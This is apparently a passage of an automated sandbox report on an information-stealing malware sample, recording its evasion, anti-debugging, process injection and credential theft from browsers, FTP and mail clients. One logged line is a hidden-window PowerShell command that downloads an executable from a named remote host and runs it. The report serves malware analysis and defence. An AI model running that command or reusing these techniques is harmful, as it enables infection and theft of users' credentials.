                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99655
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99327
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99214
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98939
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98578
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98359
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98250
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98140
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98030
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97812
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97703
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97594
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97469
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99886
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99559
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98671
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98124
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97796
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97687
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99780
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99576
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99305
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99192
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99078
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98968
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98749
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98531
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98421
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97984
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97874
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97327
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 97218
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596047
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99655
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99541
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99436
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99326
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99212
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 99000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98889
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98751
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98625
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98515
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98387
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98281
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98171
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 98062
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: RegSvcs.exe, 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: RegSvcs.exe, 00000008.00000002.2577560284.0000000006581000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllw
                    Source: wscript.exe, 0000000A.00000003.2494459581.0000017DBF6C3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: RegSvcs.exe, 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: RegSvcs.exe, 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: powershell.exe, 00000000.00000002.2297021387.000002213FA30000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.3381286822.0000000005C16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 8_2_016780A8 CheckRemoteDebuggerPresent, 8_2_016780A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10BA008
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 8A5008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Local\Temp\file.exe "C:\Users\user\AppData\Local\Temp\file.exe"
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Temp\file.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\unspattered\recomplaint.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
Source: C:\Users\user\AppData\Local\unspattered\recomplaint.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\unspattered\recomplaint.exe"
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -command "& { invoke-webrequest -uri https://oootorgline.ru/components/grace.exe -outfile c:\users\user\appdata\local\temp\file.exe; start-process 'c:\users\user\appdata\local\temp\file.exe' }"
Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Program Manager
Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: program manager
Source: RegSvcs.exe, 00000008.00000002.2567429663.00000000034E8000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: program managerTH
Source: file.exe, 00000003.00000000.2259095278.0000000000482000.00000002.00000001.01000000.00000007.sdmp, recomplaint.exe, 00000007.00000000.2334344307.0000000000482000.00000002.00000001.01000000.00000008.sdmp, recomplaint.exe, 0000000B.00000000.2494140304.0000000000482000.00000002.00000001.01000000.00000008.sdmp | Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\aWUFv\aWUFv.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2567429663.0000000003446000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5768, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4412, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 5768, type: MEMORYSTR

Remote Access Functionality

Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.3370850966.0000000002944000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.3370850966.0000000002989000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2557012499.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2567429663.0000000003414000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2567429663.0000000003446000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.2567429663.000000000343E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 4412, type: MEMORYSTR
